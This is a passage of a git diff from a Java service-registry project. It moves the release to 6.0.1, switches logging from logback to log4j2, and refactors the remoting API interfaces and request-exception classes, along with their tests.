--- a/server/distribution/session/bin/startup.bat +++ b/server/distribution/session/bin/startup.bat @@ -28,7 +28,7 @@ rem set user.home set "JAVA_OPT=%JAVA_OPT% -Duser.home=%BASE_DIR%" rem springboot conf -set "SPRINGBOOT_OPTS=%SPRINGBOOT_OPTS% --logging.config=%BASE_DIR%\conf\logback-spring.xml" +set "SPRINGBOOT_OPTS=%SPRINGBOOT_OPTS% -DLog4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector -Dlogging.config=%BASE_DIR%\conf\log4j2.xml -Dlog4j.configurationFile=%BASE_DIR%\conf\log4j2.xml" rem heap size set HEAP_MAX=512 diff --git a/server/distribution/session/bin/startup.sh b/server/distribution/session/bin/startup.sh index 32c9a5d6c..6c2eb2ea7 100644 --- a/server/distribution/session/bin/startup.sh +++ b/server/distribution/session/bin/startup.sh @@ -26,7 +26,7 @@ JAVA_OPTS="$JAVA_OPTS -Dspring.config.location=${BASE_DIR}/conf/application.prop JAVA_OPTS="$JAVA_OPTS -Duser.home=${BASE_DIR}" # springboot conf -SPRINGBOOT_OPTS="${SPRINGBOOT_OPTS} --logging.config=${BASE_DIR}/conf/logback-spring.xml" +SPRINGBOOT_OPTS="${SPRINGBOOT_OPTS} -DLog4jContextSelector=org.apache.logging.log4j.core.async.AsyncLoggerContextSelector -Dlogging.config=${BASE_DIR}/conf/log4j2.xml -Dlog4j.configurationFile=${BASE_DIR}/conf/log4j2.xml" # heap size HEAP_MAX=512 diff --git a/server/distribution/session/conf/application.properties.example b/server/distribution/session/conf/application.properties.example index 76a5e17f2..80a9f918a 100644 --- a/server/distribution/session/conf/application.properties.example +++ b/server/distribution/session/conf/application.properties.example @@ -19,9 +19,9 @@ session.server.printTask.fixedDelay=30000 session.server.schedulerCheckVersionTimeout=3 session.server.schedulerCheckVersionFirstDelay=3 session.server.schedulerCheckVersionExpBackOffBound=10 -session.server.schedulerHeartbeatTimeout=30 -session.server.schedulerHeartbeatFirstDelay=30 -session.server.schedulerHeartbeatExpBackOffBound=10 +session.server.schedulerHeartbeatTimeout=3 +session.server.schedulerHeartbeatFirstDelay=3 +session.server.schedulerHeartbeatExpBackOffBound=1 session.server.schedulerFetchDataTimeout=3 session.server.schedulerFetchDataFirstDelay=3 session.server.schedulerFetchDataExpBackOffBound=10 diff --git a/server/distribution/session/distribution-session.xml b/server/distribution/session/distribution-session.xml index 81849467b..d1334926e 100644 --- a/server/distribution/session/distribution-session.xml +++ b/server/distribution/session/distribution-session.xml @@ -22,17 +22,17 @@ ../../server/session/target/registry-server-session-executable.jar - / + ./ registry-session.jar - ../../server/session/src/main/resources/logback-spring.xml - /conf - logback-spring.xml + ../../server/session/src/main/resources/log4j2.xml + ./conf + log4j2.xml ../version - / + ./ version_${project.version} diff --git a/server/distribution/session/pom.xml b/server/distribution/session/pom.xml index e7061c240..3e4eb7f60 100644 --- a/server/distribution/session/pom.xml +++ b/server/distribution/session/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-distribution - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/server/pom.xml b/server/pom.xml index 23abe7efe..6cbeec3a0 100644 --- a/server/pom.xml +++ b/server/pom.xml @@ -7,7 +7,7 @@ com.alipay.sofa registry-parent - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml @@ -26,7 +26,6 @@ common store server - consistency distribution diff --git a/server/remoting/api/pom.xml b/server/remoting/api/pom.xml index 4be3abfe7..ca5e19741 100644 --- a/server/remoting/api/pom.xml +++ b/server/remoting/api/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-remoting - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/CallbackHandler.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/CallbackHandler.java index 2b32e72a0..79048366d 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/CallbackHandler.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/CallbackHandler.java @@ -16,26 +16,34 @@ */ package com.alipay.sofa.registry.remoting; +import java.util.concurrent.Executor; + /** - * * @author shangyu.wh * @version $Id: CallbackHandler.java, v 0.1 2017-11-22 15:16 shangyu.wh Exp $ */ public interface CallbackHandler { - /** - * callback handler - * - * @param channel - * @param message - */ - void onCallback(Channel channel, Object message); + /** + * callback handler + * + * @param channel + * @param message + */ + void onCallback(Channel channel, Object message); + + /** + * callback exception handler + * + * @param channel + * @param exception + */ + void onException(Channel channel, Throwable exception); - /** - * callback exception handler - * - * @param channel - * @param exception - */ - void onException(Channel channel, Throwable exception); -} \ No newline at end of file + /** + * override executor + * + * @return + */ + Executor getExecutor(); +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Channel.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Channel.java index 4f51ffed2..23646c6fd 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Channel.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Channel.java @@ -16,56 +16,58 @@ */ package com.alipay.sofa.registry.remoting; -import javax.ws.rs.client.WebTarget; import java.net.InetSocketAddress; +import javax.ws.rs.client.WebTarget; /** - * * @author shangyu.wh * @version $Id: Channel.java, v 0.1 2017-11-20 20:39 shangyu.wh Exp $ */ public interface Channel { - /** - * get remote address. - * - * @return remote address. - */ - InetSocketAddress getRemoteAddress(); + /** + * get remote address. + * + * @return remote address. + */ + InetSocketAddress getRemoteAddress(); + + /** + * get local address. + * + * @return local address. + */ + InetSocketAddress getLocalAddress(); - /** - * get local address. - * - * @return local address. - */ - InetSocketAddress getLocalAddress(); + /** + * is connected. + * + * @return connected + */ + boolean isConnected(); - /** - * is connected. - * - * @return connected - */ - boolean isConnected(); + /** + * get attribute. + * + * @param key key. + * @return value. + */ + Object getAttribute(String key); - /** - * get attribute. - * - * @param key key. - * @return value. - */ - Object getAttribute(String key); + /** + * set attribute. + * + * @param key key. + * @param value value. + */ + void setAttribute(String key, Object value); - /** - * set attribute. - * - * @param key key. - * @param value value. - */ - void setAttribute(String key, Object value); + /** + * for rest api + * + * @return + */ + WebTarget getWebTarget(); - /** - * for rest api - * @return - */ - WebTarget getWebTarget(); -} \ No newline at end of file + void close(); +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/ChannelHandler.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/ChannelHandler.java index f913ca32b..3c5647d74 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/ChannelHandler.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/ChannelHandler.java @@ -19,99 +19,97 @@ import java.util.concurrent.Executor; /** - * * @author shangyu.wh * @version $Id: ChannelHandler.java, v 0.1 2017-11-20 20:45 shangyu.wh Exp $ */ public interface ChannelHandler { - /** - * The enum Handler type. - */ - enum HandlerType { - LISENTER, - PROCESSER - } + /** The enum Handler type. */ + enum HandlerType { + LISTENER, + PROCESSER + } - /** - * The enum Invoke type. - */ - enum InvokeType { - SYNC, - ASYNC - } + /** The enum Invoke type. */ + enum InvokeType { + SYNC, + ASYNC + } - /** - * on channel connected. - * - * @param channel - * @throws RemotingException - */ - void connected(Channel channel) throws RemotingException; + /** + * on channel connected. + * + * @param channel + * @throws RemotingException + */ + void connected(Channel channel) throws RemotingException; - /** - * on channel disconnected. - * - * @param channel channel. - * @throws RemotingException - */ - void disconnected(Channel channel) throws RemotingException; + /** + * on channel disconnected. + * + * @param channel channel. + * @throws RemotingException + */ + void disconnected(Channel channel) throws RemotingException; - /** - * on message received. - * - * @param channel channel. - * @param message message. - * @throws RemotingException - */ - void received(Channel channel, T message) throws RemotingException; + /** + * on message received. + * + * @param channel channel. + * @param message message. + * @throws RemotingException + */ + void received(Channel channel, T message) throws RemotingException; - /** - * on message reply. - * - * @param channel - * @param message - * @return - * @throws RemotingException - */ - Object reply(Channel channel, T message) throws RemotingException; + /** + * on message reply. + * + * @param channel + * @param message + * @return + * @throws RemotingException + */ + Object reply(Channel channel, T message) throws RemotingException; - /** - * on exception caught. - * @param channel channel. - * @param message message. - * @param exception exception. - * @throws RemotingException - */ - void caught(Channel channel, T message, Throwable exception) throws RemotingException; + /** + * on exception caught. + * + * @param channel channel. + * @param message message. + * @param exception exception. + * @throws RemotingException + */ + void caught(Channel channel, T message, Throwable exception) throws RemotingException; - /** - * check handlerType - * - * @return - */ - HandlerType getType(); + /** + * check handlerType + * + * @return + */ + HandlerType getType(); - /** - * return processor request class name - * - * @return - */ - Class interest(); + /** + * return processor request class name + * + * @return + */ + Class interest(); - /** - * Select Sync process by reply or Async process by received - * @return - */ - default InvokeType getInvokeType() { - return InvokeType.SYNC; - } + /** + * Select Sync process by reply or Async process by received + * + * @return + */ + default InvokeType getInvokeType() { + return InvokeType.SYNC; + } - /** - * specify executor for processor handler - * @return - */ - default Executor getExecutor() { - return null; - } -} \ No newline at end of file + /** + * specify executor for processor handler + * + * @return + */ + default Executor getExecutor() { + return null; + } +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Client.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Client.java index f19aba5a6..c55b8c7af 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Client.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Client.java @@ -18,43 +18,59 @@ import com.alipay.sofa.registry.common.model.store.URL; -import java.net.InetSocketAddress; -import java.util.Collection; - /** - * * @author shangyu.wh * @version $Id: Client.java, v 0.1 2017-11-20 21:07 shangyu.wh Exp $ */ public interface Client extends Endpoint { - /** - * get channels. - * - * @return channels - */ - Collection getChannels(); + /** + * get channel by url. + * + * @param url + * @return channel + */ + Channel getChannel(URL url); + + /** + * client connect target url server + * + * @param url + * @return + */ + Channel connect(URL url); - /** - * get channel. - * - * @param remoteAddress - * @return channel - */ - Channel getChannel(InetSocketAddress remoteAddress); + /** + * Sync send + * + * @param url the url + * @param message the message + * @param timeoutMillis the timeout millis + * @return object + */ + Object sendSync(final URL url, final Object message, final int timeoutMillis); - /** - * get channel by url. - * - * @param url - * @return channel - */ - Channel getChannel(URL url); + /** + * send with callback handler + * + * @param url the url + * @param message the message + * @param callbackHandler the callback handler + * @param timeoutMillis the timeout millis + */ + void sendCallback( + final URL url, + final Object message, + CallbackHandler callbackHandler, + final int timeoutMillis); - /** - * client connect target url server - * @param url - * @return - */ - Channel connect(URL url); -} \ No newline at end of file + /** + * Sync send + * + * @param channel the channel + * @param message the message + * @param timeoutMillis the timeout millis + * @return object + */ + Object sendSync(final Channel channel, final Object message, final int timeoutMillis); +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Endpoint.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Endpoint.java index 10cff4f22..40bdd1129 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Endpoint.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Endpoint.java @@ -17,73 +17,30 @@ package com.alipay.sofa.registry.remoting; import java.net.InetSocketAddress; -import java.util.List; /** * The interface Endpoint. + * * @author shangyu.wh + * @author kezhu.wukz * @version $Id : Endpoint.java, v 0.1 2017-11-20 20:03 shangyu.wh Exp $ */ public interface Endpoint { - /** - * get channel handlers. - * - * @return channel handlers - */ - List getChannelHandlers(); - - /** - * get local address. - * - * @return local address. - */ - InetSocketAddress getLocalAddress(); - - /** - * close the channel. - */ - void close(); - - /** - * Close. - * - * @param channel the channel - */ - void close(final Channel channel); - - /** - * is closed. - * - * @return closed boolean - */ - boolean isClosed(); - - /** - * oneway send - * @param channel the channel - * @param message the message - */ - void sendOneway(final Channel channel, final Object message); - - /** - * Sync send - * - * @param channel the channel - * @param message the message - * @param timeoutMillis the timeout millis - * @return object - */ - Object sendSync(final Channel channel, final Object message, final int timeoutMillis); - - /** - * send with callback handler - * - * @param channel the channel - * @param message the message - * @param callbackHandler the callback handler - * @param timeoutMillis the timeout millis - */ - void sendCallback(final Channel channel, final Object message, CallbackHandler callbackHandler, - final int timeoutMillis); -} \ No newline at end of file + /** + * get local address. + * + * @return local address. + */ + InetSocketAddress getLocalAddress(); + + /** close the channel. */ + void close(); + + /** + * is closed. + * + * @return closed boolean + */ + boolean isClosed(); +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/RemotingException.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/RemotingException.java index 727a4b6c5..8987e36a9 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/RemotingException.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/RemotingException.java @@ -17,17 +17,17 @@ package com.alipay.sofa.registry.remoting; /** - * * @author shangyu.wh * @version $Id: RemotingException.java, v 0.1 2017-11-20 20:43 shangyu.wh Exp $ */ public class RemotingException extends Exception { - /** - * constructor - * @param s - */ - public RemotingException(String s) { - super(s); - } -} \ No newline at end of file + /** + * constructor + * + * @param s + */ + public RemotingException(String s) { + super(s); + } +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Server.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Server.java index 7452bb4f4..345cc95eb 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Server.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/Server.java @@ -17,44 +17,78 @@ package com.alipay.sofa.registry.remoting; import com.alipay.sofa.registry.common.model.store.URL; - import java.net.InetSocketAddress; -import java.util.Collection; +import java.util.List; +import java.util.Map; /** - * * @author shangyu.wh * @version $Id: Server.java, v 0.1 2017-11-20 21:05 shangyu.wh Exp $ */ public interface Server extends Endpoint { - /** - * get Server status - * - * @return - */ - boolean isOpen(); - - /** - * get channels. - * - * @return channels - */ - Collection getChannels(); - - /** - * get channel. - * - * @param remoteAddress - * @return channel - */ - Channel getChannel(InetSocketAddress remoteAddress); - - /** - * get channel by url - * - * @param url - * @return channel - */ - Channel getChannel(URL url); -} \ No newline at end of file + /** + * get Server status + * + * @return + */ + boolean isOpen(); + + /** + * get channels. + * + * @return channels + */ + List getChannels(); + + /** select one available channel for every ip */ + Map selectAvailableChannelsForHostAddress(); + /** + * get channel. + * + * @param remoteAddress + * @return channel + */ + Channel getChannel(InetSocketAddress remoteAddress); + + /** + * get channel by url + * + * @param url + * @return channel + */ + Channel getChannel(URL url); + + /** + * close the channel. + * + * @param channel + */ + void close(Channel channel); + + int getChannelCount(); + + /** + * send with callback handler + * + * @param channel the channel + * @param message the message + * @param callbackHandler the callback handler + * @param timeoutMillis the timeout millis + */ + void sendCallback( + final Channel channel, + final Object message, + CallbackHandler callbackHandler, + final int timeoutMillis); + + /** + * Sync send + * + * @param channel the channel + * @param message the message + * @param timeoutMillis the timeout millis + * @return object + */ + Object sendSync(final Channel channel, final Object message, final int timeoutMillis); +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/Exchange.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/Exchange.java index 961167107..5f3880767 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/Exchange.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/Exchange.java @@ -21,45 +21,65 @@ import com.alipay.sofa.registry.remoting.Server; /** - * * @author shangyu.wh * @version $Id: Exchanger.java, v 0.1 2017-11-20 21:25 shangyu.wh Exp $ */ public interface Exchange { + String SESSION_SERVER_TYPE = "sessionServer"; + String DATA_SERVER_TYPE = "dataServer"; + String DATA_SERVER_NOTIFY_TYPE = "dataServerNotify"; + String META_SERVER_TYPE = "metaServer"; + + /** + * connect same type server,one server ip one connection such as different server on data + * server,serverOne and serverTwo,different type server must match different channelHandlers, so + * we must connect by serverType,and get Client instance by serverType + * + * @param serverType + * @param serverUrl + * @param channelHandlers + * @return + */ + Client connect(String serverType, URL serverUrl, T... channelHandlers); - String DATA_SERVER_TYPE = "dataServer"; - String META_SERVER_TYPE = "metaServer"; + /** + * connect same type server,one server ip one connection such as different server on data + * server,serverOne and serverTwo,different type server must match different channelHandlers, so + * we must connect by serverType,and get Client instance by serverType + * + * @param serverType + * @param connNum connection number per serverUrl + * @param serverUrl + * @param channelHandlers + * @return + */ + Client connect(String serverType, int connNum, URL serverUrl, T... channelHandlers); - /** - * connect same type server,one server ip one connection - * such as different server on data server,serverOne and serverTwo,different type server must match different channelHandlers, - * so we must connect by serverType,and get Client instance by serverType - * @param serverType - * @param serverUrl - * @param channelHandlers - * @return - */ - Client connect(String serverType, URL serverUrl, T... channelHandlers); + /** + * bind server by server port in url parameter,one port must by same server type + * + * @param url + * @param channelHandlers + * @return + */ + Server open(URL url, T... channelHandlers); - /** - * bind server by server port in url parameter,one port must by same server type - * @param url - * @param channelHandlers - * @return - */ - Server open(URL url, T... channelHandlers); + Server open(URL url, int lowWaterMark, int highWaterMark, T... channelHandlers); - /*** - * get Client instance by serverType,very client instance has different channels match different server ip - * @param serverType - * @return - */ - Client getClient(String serverType); + /** + * * get Client instance by serverType,very client instance has different channels match different + * server ip + * + * @param serverType + * @return + */ + Client getClient(String serverType); - /** - * get server instance by port - * @param port - * @return - */ - Server getServer(Integer port); -} \ No newline at end of file + /** + * get server instance by port + * + * @param port + * @return + */ + Server getServer(Integer port); +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/NodeExchanger.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/NodeExchanger.java index 5e6a5f3e9..1b1db277b 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/NodeExchanger.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/NodeExchanger.java @@ -21,23 +21,17 @@ import com.alipay.sofa.registry.remoting.exchange.message.Response; /** - * * @author shangyu.wh * @version $Id: NodeExchanger.java, v 0.1 2017-12-01 11:48 shangyu.wh Exp $ */ public interface NodeExchanger { - /** - * - * @param request - * @return - * @throws RequestException - */ - Response request(Request request) throws RequestException; + /** + * @param request + * @return + * @throws RequestException + */ + Response request(Request request) throws RequestException; - /** - * - * @return - */ - Client connectServer(); -} \ No newline at end of file + Client connectServer(); +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/RequestChannelClosedException.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/RequestChannelClosedException.java new file mode 100644 index 000000000..373e19774 --- /dev/null +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/RequestChannelClosedException.java @@ -0,0 +1,29 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.exchange; + +import com.alipay.sofa.registry.remoting.exchange.message.Request; + +public class RequestChannelClosedException extends RequestException { + public RequestChannelClosedException(String message, Request request) { + super(message, request); + } + + public RequestChannelClosedException(String message) { + super(message); + } +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/RequestException.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/RequestException.java index 3340bbf4b..d768dc135 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/RequestException.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/RequestException.java @@ -19,72 +19,87 @@ import com.alipay.sofa.registry.remoting.exchange.message.Request; /** - * * @author shangyu.wh * @version $Id: RequestException.java, v 0.1 2018-01-15 18:16 shangyu.wh Exp $ */ -public class RequestException extends Exception { +public class RequestException extends RuntimeException { - private Request request; + private Request request; - /** - * constructor - * @param message - * @param request - */ - public RequestException(String message, Request request) { - super(message); - this.request = request; - } + /** + * constructor + * + * @param message + * @param request + */ + public RequestException(String message, Request request) { + super(message); + this.request = request; + } - /** - * constructor - * @param message - * @param request - * @param cause - */ - public RequestException(String message, Request request, Throwable cause) { - super(message, cause); - this.request = request; - } + /** + * constructor + * + * @param message + * @param request + * @param cause + */ + public RequestException(String message, Request request, Throwable cause) { + super(message, cause); + this.request = request; + } - /** - * constructor - * @param message - */ - public RequestException(String message) { - super(message); - } + /** + * constructor + * + * @param message + */ + public RequestException(String message) { + super(message); + } - /** - * constructor - * @param message - * @param cause - */ - public RequestException(String message, Throwable cause) { - super(message, cause); - } + /** + * constructor + * + * @param message + * @param cause + */ + public RequestException(String message, Throwable cause) { + super(message, cause); + } - /** - * constructor - * @param cause - */ - public RequestException(Throwable cause) { - super(cause); - } + /** + * constructor + * + * @param cause + */ + public RequestException(Throwable cause) { + super(cause); + } - /** - * get requestInfo from Request - * @return - */ - public String getRequestMessage() { - StringBuilder sb = new StringBuilder(); - if (request != null) { - sb.append("Request url:").append(request.getRequestUrl()).append(" body:") - .append(request.getRequestBody()); - } else { - sb.append("Request data can not be null!"); - } - return sb.toString(); + /** + * get requestInfo from Request + * + * @return + */ + @Override + public String getMessage() { + StringBuilder sb = new StringBuilder(256); + if (request != null) { + final Object requestBody = request.getRequestBody(); + String requestBodyStr = null; + if (requestBody instanceof String) { + requestBodyStr = requestBody.toString(); + } else if (requestBody != null) { + requestBodyStr = request.getRequestBody().getClass().getSimpleName(); + } + sb.append("request url: ") + .append(request.getRequestUrl()) + .append(", body: ") + .append(requestBodyStr) + .append(", "); } -} \ No newline at end of file + sb.append(super.getMessage()); + return sb.toString(); + } +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/message/Request.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/message/Request.java index 7bf15fff0..bed9d00df 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/message/Request.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/message/Request.java @@ -18,46 +18,50 @@ import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.remoting.CallbackHandler; - import java.util.concurrent.atomic.AtomicInteger; /** * The interface Request. * - * @param the type parameter + * @param the type parameter * @author shangyu.wh * @version $Id : Request.java, v 0.1 2017-11-30 17:33 shangyu.wh Exp $ */ public interface Request { - /** - * Gets request body. - * - * @return the request body - */ - T getRequestBody(); + /** + * Gets request body. + * + * @return the request body + */ + T getRequestBody(); + + /** + * Gets request url. + * + * @return the request url + */ + URL getRequestUrl(); - /** - * Gets request url. - * - * @return the request url - */ - URL getRequestUrl(); + /** + * Gets call back handler. + * + * @return the call back handler + */ + default CallbackHandler getCallBackHandler() { + return null; + } - /** - * Gets call back handler. - * - * @return the call back handler - */ - default CallbackHandler getCallBackHandler() { - return null; - } + /** + * request send by retry some times + * + * @return + */ + default AtomicInteger getRetryTimes() { + return new AtomicInteger(); + } - /** - * request send by retry some times - * @return - */ - default AtomicInteger getRetryTimes() { - return new AtomicInteger(); - } -} \ No newline at end of file + default Integer getTimeout() { + return null; + } +} diff --git a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/message/Response.java b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/message/Response.java index 83b3ec5a1..a42017104 100644 --- a/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/message/Response.java +++ b/server/remoting/api/src/main/java/com/alipay/sofa/registry/remoting/exchange/message/Response.java @@ -17,23 +17,21 @@ package com.alipay.sofa.registry.remoting.exchange.message; /** - * * @author shangyu.wh * @version $Id: Response.java, v 0.1 2017-11-30 17:39 shangyu.wh Exp $ */ public interface Response { - /** - * The enum for response status - */ - enum ResultStatus { - SUCCESSFUL, FAILED - } - - /** - * Get response result - * @return - */ - T getResult(); + /** The enum for response status */ + enum ResultStatus { + SUCCESSFUL, + FAILED + } -} \ No newline at end of file + /** + * Get response result + * + * @return + */ + T getResult(); +} diff --git a/server/remoting/api/src/test/java/com/alipay/sofa/registry/remoting/RequestExceptionTest.java b/server/remoting/api/src/test/java/com/alipay/sofa/registry/remoting/RequestExceptionTest.java index 7f98cc690..ae42661c9 100644 --- a/server/remoting/api/src/test/java/com/alipay/sofa/registry/remoting/RequestExceptionTest.java +++ b/server/remoting/api/src/test/java/com/alipay/sofa/registry/remoting/RequestExceptionTest.java @@ -17,6 +17,7 @@ package com.alipay.sofa.registry.remoting; import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.remoting.exchange.RequestChannelClosedException; import com.alipay.sofa.registry.remoting.exchange.RequestException; import com.alipay.sofa.registry.remoting.exchange.message.Request; import org.junit.Assert; @@ -27,40 +28,77 @@ * @since 2019/1/16 */ public class RequestExceptionTest { - @Test - public void doTest() { - RequestException exception = new RequestException("error message"); - Assert.assertEquals("error message", exception.getMessage()); - Assert.assertEquals("Request data can not be null!", exception.getRequestMessage()); + @Test + public void doRequestExceptionTest() { + RequestException exception = new RequestException("error message"); + Assert.assertEquals("error message", exception.getMessage()); - RuntimeException runtimeException = new RuntimeException("error message"); - exception = new RequestException(runtimeException); - Assert.assertEquals("java.lang.RuntimeException: error message", exception.getMessage()); - Assert.assertEquals(runtimeException, exception.getCause()); - Assert.assertEquals("Request data can not be null!", exception.getRequestMessage()); + RuntimeException runtimeException = new RuntimeException("error message"); + exception = new RequestException(runtimeException); + Assert.assertEquals("java.lang.RuntimeException: error message", exception.getMessage()); + Assert.assertEquals(runtimeException, exception.getCause()); + Assert.assertEquals("java.lang.RuntimeException: error message", exception.getMessage()); - exception = new RequestException("error message", runtimeException); - Assert.assertEquals("error message", exception.getMessage()); - Assert.assertEquals(runtimeException, exception.getCause()); - Assert.assertEquals("Request data can not be null!", exception.getRequestMessage()); + exception = new RequestException("error message", runtimeException); + Assert.assertEquals("error message", exception.getMessage()); + Assert.assertEquals(runtimeException, exception.getCause()); - Request request = new Request() { - @Override - public Object getRequestBody() { - return "request body"; - } + Request request = + new Request() { + @Override + public Object getRequestBody() { + return "request body"; + } - @Override - public URL getRequestUrl() { - return null; - } + @Override + public URL getRequestUrl() { + return null; + } }; - exception = new RequestException("error message", request); - Assert.assertEquals("error message", exception.getMessage()); - Assert.assertEquals("Request url:null body:request body", exception.getRequestMessage()); + exception = new RequestException("error message", request); + Assert.assertEquals( + "request url: null, body: request body, error message", exception.getMessage()); + + exception = new RequestException("error message", request, runtimeException); + Assert.assertEquals( + "request url: null, body: request body, error message", exception.getMessage()); + + exception = + new RequestException( + "test", + new Request() { + @Override + public Object getRequestBody() { + return 1; + } + + @Override + public URL getRequestUrl() { + return null; + } + }); + + Assert.assertTrue(exception.getMessage().contains(Integer.class.getSimpleName())); + } + + public void requestChannelClosedExceptionTest() { + RequestChannelClosedException exception = + new RequestChannelClosedException( + "test", + new Request() { + @Override + public Object getRequestBody() { + return 1; + } + + @Override + public URL getRequestUrl() { + return null; + } + }); + Assert.assertTrue(exception.getMessage().contains(Integer.class.getSimpleName())); - exception = new RequestException("error message", request, runtimeException); - Assert.assertEquals("error message", exception.getMessage()); - Assert.assertEquals("Request url:null body:request body", exception.getRequestMessage()); - } + exception = new RequestChannelClosedException("test"); + Assert.assertTrue(exception.getMessage().contains("test")); + } } diff --git a/server/remoting/bolt/pom.xml b/server/remoting/bolt/pom.xml index 21262538c..abcfd609b 100644 --- a/server/remoting/bolt/pom.xml +++ b/server/remoting/bolt/pom.xml @@ -5,7 +5,7 @@ com.alipay.sofa registry-remoting - 5.2.0-SNAPSHOT + 6.0.1 ../pom.xml 4.0.0 @@ -47,5 +47,11 @@ junit test + + + org.mockito + mockito-core + test + diff --git a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/AsyncUserProcessorAdapter.java b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/AsyncUserProcessorAdapter.java index 94aa4657a..99f413d8d 100644 --- a/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/AsyncUserProcessorAdapter.java +++ b/server/remoting/bolt/src/main/java/com/alipay/sofa/registry/remoting/bolt/AsyncUserProcessorAdapter.java @@ -22,60 +22,50 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.ChannelHandler; - import java.util.concurrent.Executor; /** - * * @author shangyu.wh * @version $Id: AsyncUserProcessorAdapter.java, v 0.1 2018-01-18 21:24 shangyu.wh Exp $ */ public class AsyncUserProcessorAdapter extends AsyncUserProcessor { - private static final Logger LOGGER = LoggerFactory.getLogger(AsyncUserProcessorAdapter.class); + private static final Logger LOGGER = LoggerFactory.getLogger(AsyncUserProcessorAdapter.class); - private ChannelHandler userProcessorHandler; - - /** - * constructor - * @param userProcessorHandler - */ - public AsyncUserProcessorAdapter(ChannelHandler userProcessorHandler) { - this.userProcessorHandler = userProcessorHandler; - } + private final ChannelHandler userProcessorHandler; - @Override - public void handleRequest(BizContext bizCtx, AsyncContext asyncCtx, Object request) { + /** + * constructor + * + * @param userProcessorHandler + */ + public AsyncUserProcessorAdapter(ChannelHandler userProcessorHandler) { + this.userProcessorHandler = userProcessorHandler; + } - BoltChannel boltChannel = new BoltChannel(); - 